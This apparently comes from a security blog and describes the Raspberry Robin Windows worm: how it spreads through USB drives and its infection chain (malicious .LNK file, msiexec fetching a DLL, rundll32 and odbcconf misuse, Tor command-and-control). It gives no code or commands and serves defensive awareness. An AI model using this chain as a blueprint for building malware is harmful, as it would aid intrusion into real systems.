A new Microsoft Windows malware has been discovered by security researchers which has worm-like capabilities and is spreading via removable USB devices containing malicious code. LNK file.
What is Raspberry Robin?
Raspberry Robin is a Windows worm which propagates through removable USB devices. It was first spotted in September 2021 by cybersecurity researchers from Red Canary. The experts observed that the malware was targeted at organisations in the technology and manufacturing industries.
Microsoft has spotted this Windows worm in the networks of hundreds of organisations. They have observed that the malware is connecting to addresses on the Tor network. It is also observed that it can bypass User Account Control (UAC) on infected systems using legitimate Windows tools.
Raspberry Robin worm infection flow
Infected USB drive attached
Raspberry Robin is typically introduced by infected removable drives - such as USB devices - containing a malicious .LNK file pretending to be a legitimate folder.
cmd.exe and msiexec.exe commands
As the user clicks the .LNK file, the worm spawns. cmd.exe reads and executes a malicious file stored on the infected device. Then msiexec.exe(command line Windows Installer component) attempts to connect to a short URL (often QNAP-associated).
Malicious .DLL download
If the external msiexec.exe connection is successful, it downloads and install a malicious .DLL
Rundll32.exe and Windows utility misuse
Rundll32.exe launches a legitimate Windows utility like obdcconf.exe (a tool for configuring ODBC drivers) to execute the malicious .DLL
Ongoing command and control activity
regsvr32.exe, rundll32.exe, and dllhost.exe repeatedly attempt outbound network connections, typically to TOR nodes
Raspberry Robins were spotted in the wild by security researchers. The security researchers are working on finding the operators’ end goal and have yet to attribute the malware to a threat group. Some findings related to Raspberry Robin are shared on VirusTotal.
References:
Detection:
Commentaires